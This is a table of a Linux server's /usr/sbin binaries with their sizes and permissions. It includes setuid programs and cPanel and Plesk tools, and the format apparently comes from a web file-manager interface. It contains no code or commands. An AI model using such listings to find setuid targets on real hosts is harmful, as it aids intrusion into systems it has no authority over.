| selabel_digest | File | 12.28 KB | 0755 |
|
| selabel_lookup | File | 12.27 KB | 0755 |
|
| selabel_lookup_best_match | File | 11.89 KB | 0755 |
|
| selabel_partial_match | File | 11.88 KB | 0755 |
|
| selinux_check_access | File | 12.36 KB | 0755 |
|
| selinuxconlist | File | 11.88 KB | 0755 |
|
| selinuxdefcon | File | 11.88 KB | 0755 |
|
| selinuxenabled | File | 7.84 KB | 0755 |
|
| selinuxexeccon | File | 11.86 KB | 0755 |
|
| semodule | File | 29.27 KB | 0755 |
|
| sendmail | File | 16.91 KB | 2755 |
|
| service | File | 3.64 KB | 0755 |
|
| sestatus | File | 20.41 KB | 0755 |
|
| setcap | File | 16.27 KB | 0755 |
|
| setenforce | File | 12.27 KB | 0755 |
|
| setfiles | File | 20.53 KB | 0755 |
|
| setquota | File | 91.38 KB | 0755 |
|
| setsebool | File | 16.38 KB | 0755 |
|
| sfdisk | File | 118.51 KB | 0755 |
|
| showmount | File | 21.06 KB | 0755 |
|
| shutdown | File | 218.45 KB | 0755 |
|
| sim_server | File | 11.87 KB | 0755 |
|
| slattach | File | 43.76 KB | 0755 |
|
| sm-notify | File | 78.13 KB | 0755 |
|
| smartctl | File | 907.08 KB | 0755 |
|
| smartd | File | 733.2 KB | 0755 |
|
| ss | File | 191.3 KB | 0755 |
|
| sshd | File | 869.7 KB | 0755 |
|
| sss_cache | File | 61.09 KB | 0755 |
|
| sssd | File | 73.01 KB | 0755 |
|
| start-statd | File | 838 B | 0755 |
|
| start-stop-daemon | File | 45.98 KB | 0755 |
|
| suexec | File | 25.3 KB | 4755 |
|
| sulogin | File | 49.24 KB | 0755 |
|
| sw-engine-fpm | File | 20.12 MB | 0755 |
|
| swaplabel | File | 16.5 KB | 0755 |
|
| swapoff | File | 20.75 KB | 0755 |
|
| swapon | File | 49.41 KB | 0755 |
|
| switch_root | File | 16.49 KB | 0755 |
|
| sysctl | File | 28.88 KB | 0755 |
|
| syspurpose | File | 415 B | 0755 |
|
| tcpdump | File | 1.01 MB | 0755 |
|
| tcpslice | File | 32.63 KB | 0755 |
|
| tcsd | File | 309.72 KB | 0755 |
|
| telinit | File | 218.45 KB | 0755 |
|
| testsaslauthd | File | 16.66 KB | 0755 |
|
| timedatex | File | 33.43 KB | 0755 |
|
| tipc | File | 163.07 KB | 0755 |
|
| tmpwatch | File | 35.47 KB | 0755 |
|
| tracepath | File | 20.44 KB | 0755 |
|
| tracepath6 | File | 20.44 KB | 0755 |
|
| tsig-keygen | File | 20.46 KB | 0755 |
|
| tune2fs | File | 110.63 KB | 0755 |
|
| tuned | File | 3.88 KB | 0755 |
|
| tuned-adm | File | 6.5 KB | 0755 |
|
| udevadm | File | 424.56 KB | 0755 |
|
| umount.nfs | File | 197.24 KB | 4755 |
|
| umount.nfs4 | File | 197.24 KB | 4755 |
|
| unbound-anchor | File | 57.34 KB | 0755 |
|
| unix_chkpwd | File | 36.86 KB | 4755 |
|
| unix_update | File | 36.86 KB | 0700 |
|
| unsquashfs | File | 99.57 KB | 0755 |
|
| update-alternatives | File | 36.66 KB | 0755 |
|
| update-smart-drivedb | File | 14.44 KB | 0755 |
|
| useradd | File | 148.16 KB | 0755 |
|
| userdel | File | 107.29 KB | 0755 |
|
| usermod | File | 144.11 KB | 0755 |
|
| usernetctl | File | 12.41 KB | 4755 |
|
| uuserver | File | 15.88 KB | 0755 |
|
| vdpa | File | 118.04 KB | 0755 |
|
| vigr | File | 68.05 KB | 0755 |
|
| vipw | File | 68.05 KB | 0755 |
|
| virt-what | File | 14.22 KB | 0755 |
|
| visudo | File | 239.28 KB | 0755 |
|
| vmcore-dmesg | File | 28.58 KB | 0755 |
|
| vpddecode | File | 16.47 KB | 0755 |
|
| weak-modules | File | 33.6 KB | 0755 |
|
| whmapi0 | File | 3.38 MB | 0755 |
|
| whmapi1 | File | 3.38 MB | 0755 |
|
| whmlogin | File | 2.33 KB | 0755 |
|
| wipefs | File | 41.12 KB | 0755 |
|
| xfs_admin | File | 1.38 KB | 0755 |
|
| xfs_bmap | File | 695 B | 0755 |
|
| xfs_copy | File | 434.59 KB | 0755 |
|
| xfs_db | File | 760.47 KB | 0755 |
|
| xfs_estimate | File | 12.39 KB | 0755 |
|
| xfs_freeze | File | 800 B | 0755 |
|
| xfs_fsr | File | 53.41 KB | 0755 |
|
| xfs_growfs | File | 422.48 KB | 0755 |
|
| xfs_info | File | 1.26 KB | 0755 |
|
| xfs_io | File | 188.28 KB | 0755 |
|
| xfs_logprint | File | 454.7 KB | 0755 |
|
| xfs_mdrestore | File | 410.09 KB | 0755 |
|
| xfs_metadump | File | 782 B | 0755 |
|
| xfs_mkfile | File | 1.02 KB | 0755 |
|
| xfs_ncheck | File | 685 B | 0755 |
|
| xfs_quota | File | 93.98 KB | 0755 |
|
| xfs_repair | File | 715.24 KB | 0755 |
|
| xfs_rtcp | File | 16.38 KB | 0755 |
|
| xfs_spaceman | File | 45.42 KB | 0755 |
|
| xqmstats | File | 16.45 KB | 0755 |
|
| xtables-monitor | File | 220.8 KB | 0755 |
|
| xtables-nft-multi | File | 220.8 KB | 0755 |
|
| zdump | File | 20.56 KB | 0755 |
|
| zic | File | 52.83 KB | 0755 |
|
| zramctl | File | 99.13 KB | 0755 |
|